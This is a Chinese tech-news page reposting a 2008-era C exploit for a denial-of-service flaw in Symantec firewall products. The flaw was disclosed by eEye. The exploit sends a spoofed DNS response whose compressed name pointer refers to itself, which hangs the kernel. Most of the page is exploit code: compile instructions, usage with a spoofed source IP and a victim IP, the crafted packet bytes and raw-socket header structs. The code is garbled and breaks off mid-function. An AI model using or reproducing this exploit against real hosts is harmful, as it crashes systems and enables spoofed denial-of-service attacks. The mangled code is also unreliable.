科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道赛门铁克网络防火墙D.o.s攻击代码

赛门铁克网络防火墙D.o.s攻击代码

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击。

作者:论坛整理 来源:zdnet网络安全 2008年4月14日

关键字: 防火墙 防火墙技术 硬件防火墙

  • 评论
  • 分享微博
  • 分享邮件

  名称:HOD-symantec-firewall-DoS-expl.c:
  版本:Version 0.1 coded by houseofdabus
  翻译:luoluo
  漏洞发现:www.eEye.com
  漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html
  
  * -------------------------------------------------------------------
  * 程序测试:
  * - Symantec Norton Personal Firewall 2004
  
  * 受影响产品:
  * - Symantec Norton Internet Security 2002
  * - Symantec Norton Internet Security 2003
  * - Symantec Norton Internet Security 2004
  * - Symantec Norton Internet Security Professional 2002
  * - Symantec Norton Internet Security Professional 2003
  * - Symantec Norton Internet Security Professional 2004
  * - Symantec Norton Personal Firewall 2002
  * - Symantec Norton Personal Firewall 2003
  * - Symantec Norton Personal Firewall 2004

  * - Symantec Client Firewall 5.01, 5.1.1

  * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)

  * - Symantec Norton AntiSpam 2004

  * -------------------------------------------------------------------

  * 说明:

  eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击. 通过发送单个恶意 DNS(UDP 端口 53)响应包给存在漏洞的主机, 攻击者可以使 Symantec DNS 响应确认代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启,才能恢复运行.

  * -------------------------------------------------------------------

  * 编译:

  * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib

  * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib

  * Linux: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall

  * -------------------------------------------------------------------

  * 命令行参数/说明:

  * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]

  * -fi:IP From (sender) IP address

  * -tp:int To (recipient) port number

  * -ti:IP To (recipient) IP address

  * -n:int Number of times to send message

  *

  */

  #ifdef _WIN32

  #pragma comment(lib,"ws2_32")

  #pragma pack(1)

  #define WIN32_LEAN_AND_MEAN

  #include

  #include /* IP_HDRINCL */

  #include

  #include

  #else

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #endif

  #define MAX_MESSAGE 4068

  #define MAX_PACKET 4096

  #define DEFAULT_PORT 53

  #define DEFAULT_IP "10.0.0.1"

  #define DEFAULT_COUNT 1

  

  #ifndef _WIN32

  # define FAR

  #endif

  

  /* Define the DNS header */

  char dnsreply[] =

  "xc9x9c" /* Transaction ID */

  "x80x00" /* Flags (bit 15: response) */

  "x00x01" /* Number of questions */

  "x00x01" /* Number of answer RRs */

  "x00x00" /* Number of authority RRs */

  "x00x00" /* Number of additional RRs */

  "xC0x0C"; /* Compressed name pointer to itself */

  

  /* Define the IP header */

  typedef struct ip_hdr {

  unsigned char ip_verlen; /* IP version &length */

  unsigned char ip_tos; /* IP type of service */

  unsigned short ip_totallength; /* Total length */

  unsigned short ip_id; /* Unique identifier */

  unsigned short ip_offset; /* Fragment offset field */

  unsigned char ip_ttl; /* Time to live */

  unsigned char ip_protocol; /* Protocol */

  unsigned short ip_checksum; /* IP checksum */

  unsigned int ip_srcaddr; /* Source address */

  unsigned int ip_destaddr; /* Destination address */

  } IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

  

  /* Define the UDP header */

  typedef struct udp_hdr {

  unsigned short src_portno; /* Source port number */

  unsigned short dst_portno; /* Destination port number */

  unsigned short udp_length; /* UDP packet length */

  unsigned short udp_checksum; /* UDP checksum (optional) */

  } UDP_HDR, *PUDP_HDR;

  

  /* globals */

  unsigned long dwToIP, // IP to send to

  dwFromIP; // IP to send from (spoof)

  unsigned short iToPort, // Port to send to

  iFromPort; // Port to send from (spoof)

  unsigned long dwCount; // Number of times to send

  char strMessage[MAX_MESSAGE]; // Message to send

  

  void

  usage(char *progname) {

  printf("Usage: ");

  printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int] ", progname);

  printf(" -fi:IP From (sender) IP address ");

  printf(" -tp:int To (recipient) open UDP port number: ");

  printf(" 137, 138, 445, 500(default) ");

  printf(" -ti:IP To (recipient) IP address ");

  printf(" -n:int Number of times ");

  exit(1);

  }

  

  void

  ValidateArgs(int argc, char **argv)

  {

  int i;

  

  iToPort = 500;

  iFromPort = DEFAULT_PORT;

  dwToIP = inet_addr(DEFAULT_IP);

  dwFromIP = inet_addr(DEFAULT_IP);

  dwCount = DEFAULT_COUNT;

  memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

  

  for(i = 1; i

  if ((argv[i][0] == "-") || (argv[i][0] == "/")) {

  switch (tolower(argv[i][1])) {

  case "f":

  switch (tolower(argv[i][2])) {

  case "i":

  if (strlen(argv[i]) > 4)

  dwFromIP = inet_addr(&argv[i][4]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  break;

  case "t":

  switch (tolower(argv[i][2])) {

  case "p":

  if (strlen(argv[i]) > 4)

  iToPort = atoi(&argv[i][4]);

  break;

  case "i":

  if (strlen(argv[i]) > 4)

  dwToIP = inet_addr(&argv[i][4]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  break;

  case "n":

  if (strlen(argv[i]) > 3)

  dwCount = atol(&argv[i][3]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  }

  }

  return;

  }

  

  /* This function calculates the 16-bit one"s complement sum */

  /* for the supplied buffer */

  unsigned short

  checksum(unsigned short *buffer, int size)

  {

  unsigned long cksum=0;

  

  while (size > 1) {

  cksum += *buffer++;

  size -= sizeof(unsigned short);

  }

  if (size) {

  cksum += *(unsigned char *)buffer;

  }

  cksum = (cksum >> 16) + (cksum &0xffff);

  cksum += (cksum >>16);

  

  return (unsigned short)(~cksum);

  }

  

  

  

  

  int

  main(int argc, char **argv)

  {

  #ifdef _WIN32

  WSADATA wsd;

  #endif

  int s;

  #ifdef _WIN32

  BOOL bOpt;

  #else

  int bOpt;

  #endif

  struct sockaddr_in remote;

  IP_HDR ipHdr;

  UDP_HDR udpHdr;

  int ret;

  unsigned long i;

  unsigned short iTotalSize,

  iUdpSize,

  iUdpChecksumSize,

  iIPVersion,

  iIPSize,

  cksum = 0;

  char buf[MAX_PACKET],

  *ptr = NULL;

  #ifdef _WIN32

  IN_ADDR addr;

  #else

  struct sockaddr_in addr;

  #endif

  

  printf(" Symantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1 ");

  printf("Bug discoveried by eEye: ");

  printf("

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章